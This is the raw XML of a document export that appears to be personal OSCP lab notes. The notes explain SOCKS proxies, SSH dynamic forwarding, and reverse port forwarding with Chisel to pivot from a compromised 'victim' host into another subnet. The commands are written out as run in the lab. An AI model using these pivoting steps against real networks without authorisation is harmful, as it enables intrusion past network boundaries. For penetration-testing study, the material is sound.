      <w:bookmarkEnd w:id="84"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SOCKS</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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SOCKS (Socket Secure) proxy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a type of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">general-purpose proxy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that relays TCP (and optionally UDP) traffic between a client and server through a middleman. It's commonly used for:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tunneling traffic</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> through firewalls or NAT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000983">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bypassing network restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000984">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Anonymizing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> connections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000985">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unlike HTTP proxies, which only work with HTTP(S), SOCKS proxies are lower-level and can work with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">any protocol</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that uses TCP (like SSH, SMB, RDP, etc.).</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It is often seen in the context of "dynamic" ports, like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000988">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="221"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -D 1080 user@target-ip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000989">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="221"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-D 1080 tells SSH to start dynamic port forwarding on local port 1080.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000098A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="221"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Dynamic" here means: create a local SOCKS proxy server on that port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000098B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="221"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, this is a SOCKS5 proxy (modern and supports DNS over the tunnel).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009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D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_z3p35m1x7cma" w:id="85"/>
      <w:bookmarkEnd w:id="85"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to download Chisel</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Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId204">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/jpillora/chisel/releases</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000993">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="398"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel_windows_amd64.gz – for</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 64-bit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="398"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel_windows_386.gz – for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">32-bit </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows</w:t>
      </w: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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="398"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gunzip chisel_windows_amd64.gz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000997">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="398"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mv chisel_windows_amd64 chisel.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000998">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="398"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rename it for convenience</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For Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000099B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel_linux_amd64.gz – for 64-bit Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000099C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel_linux_arm64.gz / chisel_linux_arm.gz – if you're on ARM architecture</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gunzip chisel_linux_amd64.gz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000099F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x chisel_linux_amd64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mv chisel_linux_amd64 chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rename it for convenience</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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_co4628n3cjxh" w:id="86"/>
      <w:bookmarkEnd w:id="86"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP Tunneling using Chisel (Reverse Single Port Forwarding) (windows)</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t xml:space="preserve">Here is what I ran in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP-B .150</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in order to port forward both port 5000 and 8000 from Kali to localhost on target machine. And this was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="676"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./chisel server -p 8888 --reverse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="676"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run on Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="676"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./chisel client 192.168.45.232:8888 R:5000:127.0.0.1:5000 R:8000:127.0.0.1:8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="676"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run on victim machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="676"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We don't have to specify the listening address for our Kali since it's 127.0.0.1 by default</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="676"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The other 127.0.0.1 is more the target machine, meaning it will be trafficked to 127.0.0.1 on target machine</w:t>
      </w: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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP 27.4.2. Services and Sessions</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we saw Chisel being used when our Kali was in the 192 subnet, and we wanted to access a web page on the 172 subnet. And we had compromised another user on the 172 subnet, so we used a reverse (single) port forward to connect from victim (compromised user) to Kali, and this sets up SOCKS proxy on Kali localhost. Then we can send traffic to our localhost, which gets sent to victim on 172, where it is run from the POV of victim, and so we can run commands from the 172 network (as victim). </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Specifically, we want the compromised user (victim) to forward our request to target user (in 172 network) on port 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009B5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get chisel on Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod a+x chisel</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a stands for "all"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">x stands for "execute"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Everyone can execute chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./chisel server -p 8080 --reverse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start Chisel server on Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set Chisel Listener on port 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
